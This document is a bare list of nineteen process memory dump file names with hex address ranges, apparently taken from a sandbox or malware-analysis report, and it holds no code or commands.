memory/3068-3826-0x00007FF7A1A90000-0x00007FF7A1E82000-memory.dmp

memory/3344-3840-0x00007FF7CAF40000-0x00007FF7CB332000-memory.dmp

memory/4252-3845-0x00007FF697430000-0x00007FF697822000-memory.dmp

memory/2224-3847-0x00007FF74C960000-0x00007FF74CD52000-memory.dmp

memory/3196-3855-0x00007FF78CF80000-0x00007FF78D372000-memory.dmp

memory/460-3859-0x00007FF7C7CE0000-0x00007FF7C80D2000-memory.dmp

memory/2124-3854-0x00007FF600600000-0x00007FF6009F2000-memory.dmp

memory/2696-3851-0x00007FF605AA0000-0x00007FF605E92000-memory.dmp

memory/1084-3849-0x00007FF69BB60000-0x00007FF69BF52000-memory.dmp

memory/3964-3842-0x00007FF765180000-0x00007FF765572000-memory.dmp

memory/4784-3837-0x00007FF729D70000-0x00007FF72A162000-memory.dmp

memory/220-3833-0x00007FF685EA0000-0x00007FF686292000-memory.dmp

memory/744-3830-0x00007FF624CF0000-0x00007FF6250E2000-memory.dmp

memory/4852-3829-0x00007FF710E00000-0x00007FF7111F2000-memory.dmp

memory/4856-3825-0x00007FF7BDA60000-0x00007FF7BDE52000-memory.dmp

memory/4348-3839-0x00007FF7BAF80000-0x00007FF7BB372000-memory.dmp

memory/664-3835-0x00007FF6C3C80000-0x00007FF6C4072000-memory.dmp

memory/4192-3822-0x00007FF6E3270000-0x00007FF6E3662000-memory.dmp

memory/1092-3821-0x00007FF679DC0000-0x00007FF67A1B2000-memory.dmp